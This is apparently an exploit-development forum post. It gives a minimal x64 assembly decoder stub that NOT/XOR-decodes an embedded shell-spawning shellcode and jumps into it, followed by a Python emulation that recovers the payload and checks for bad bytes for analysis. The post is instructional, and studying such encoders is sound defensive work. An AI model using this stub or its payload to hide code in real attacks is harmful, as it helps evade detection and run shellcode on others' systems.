This is a simple x64 assembly example of a shellcode decoder stub. It is kept minimal, and adjustments might be needed for it to work with any particular shellcode.
The python encoder does not verify if x00 bytes or other bad chars are generated.
The encoder for this example can be found here: https://www.postexplo.com/forum/prog...or-not-encoder
Code:
;title "xornot"
;********************************************************
;* Filename: xornot.asm                                 *
;* Author: Resheph                                      *
;* Version: 0.1                                         *
;* Kernel:                                              *
;* ISA: x64                                             *
;* Dist: Kali Linux                                     *
;* Initial Date:                                        *
;* Purpose: Decoder stub                                *
;********************************************************
; Compile and link using:
;   nasm -f elf64 ./xornot.asm -o ./xornot.o -g -Z ./errors.log
;   ld -o ./xornot ./xornot.o
; Notes: Linking might not be needed.
;   The stub rewrites its own bytes, so it must run from memory that is
;   both writable and executable; in a normally linked ELF, .text is
;   read-only and the first `not byte [rsi]` will fault.
;********************************************************
; Syscalls in /usr/include/x86_64-linux-gnu/asm/unistd_64.h
; Shellcode may not contain any bad chars

BITS 64
GLOBAL _start               ; Entry point for ELF linker

SECTION .data               ; Initialized data

SECTION .bss                ; Uninitialized data

SECTION .text               ; Code block
_start:
    jmp short stub          ; Skip ahead so we don't execute the encoded shellcode

encoded:
    db 0x1d,0x64,0x95,0x05,0x1d,0xee,0x7a,0x37,0x3c,0x3b,0x7a,0x7a,0x26,0x3d,0x06,0x1d,0xdc,0xb2,0x05,0x1d,0xdc,0xb7,0x02,0x1d,0xdc,0xb3,0x1d,0xd6,0x95,0x6e,0x5a,0x50 ; Encoded shellcode
len equ $-encoded           ; Calculate length of the encoded shellcode

stub:
    lea rsi, [rel encoded]  ; First encoded byte. Note this is an address relative to RIP (position-independent code)
    xor rcx, rcx            ; Set rcx to 0
    add cl, len             ; Load the length of the encoded shellcode (must fit in one byte)

; Decode using NOT and XOR.
decode:
    not byte [rsi]
    xor byte [rsi], 0xaa    ; XOR with 0xaa. Pick a key while encoding that does not create any bad chars.
    inc rsi                 ; Next byte
    loop decode             ; Keep decoding until rcx reaches 0
    jmp short encoded       ; Jump to the decoded shellcode and execute it
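As an added example (not the forum's encoder or the stub author's code), the Python below models the stub's decode loop so an analyst can recover the payload from a captured encoded blob offline, shows that NOT followed by XOR 0xaa collapses to a single XOR with 0x55, and adds the bad-char check the post says the encoder lacks. The function names and the bad-char set are my own choices.

```python
# Added example: emulate the xornot decode loop (NOT, then XOR key) in Python.
# Not the post's encoder; ENCODED is copied from the `encoded:` line of the stub.

ENCODED = bytes([
    0x1d, 0x64, 0x95, 0x05, 0x1d, 0xee, 0x7a, 0x37, 0x3c, 0x3b, 0x7a, 0x7a,
    0x26, 0x3d, 0x06, 0x1d, 0xdc, 0xb2, 0x05, 0x1d, 0xdc, 0xb7, 0x02, 0x1d,
    0xdc, 0xb3, 0x1d, 0xd6, 0x95, 0x6e, 0x5a, 0x50,
])
KEY = 0xaa  # the immediate in `xor byte [rsi], 0xaa`


def decode_stub(buf: bytes, key: int = KEY) -> bytes:
    """Emulate one pass of the stub: `not byte [rsi]` then `xor byte [rsi], key`."""
    out = bytearray()
    for b in buf:
        b = (~b) & 0xff  # not byte [rsi]  (keep it an 8-bit value)
        b ^= key         # xor byte [rsi], key
        out.append(b)
    return bytes(out)


def equivalent_xor_key(key: int = KEY) -> int:
    """NOT is XOR 0xff, so NOT-then-XOR-key is one XOR with (key ^ 0xff)."""
    return key ^ 0xff


def find_bad_chars(buf: bytes, bad: bytes = b"\x00") -> list:
    """Return (offset, byte) pairs where buf contains a forbidden byte.

    The post's encoder does not perform this check; run it on the encoded
    blob before relying on it."""
    return [(i, b) for i, b in enumerate(buf) if b in bad]


if __name__ == "__main__":
    payload = decode_stub(ENCODED)
    single = bytes(b ^ equivalent_xor_key() for b in ENCODED)
    print("single-XOR key equivalent to NOT+XOR 0xaa: 0x%02x" % equivalent_xor_key())
    print("same result with one XOR:", payload == single)
    print("decoded bytes:", payload.hex())
    print("bad chars in encoded blob:", find_bad_chars(ENCODED, b"\x00\x0a\x0d"))
```

Because the two operations reduce to a single-byte XOR, this stub offers no more obfuscation than a plain XOR encoder, which is worth knowing when triaging samples that use it.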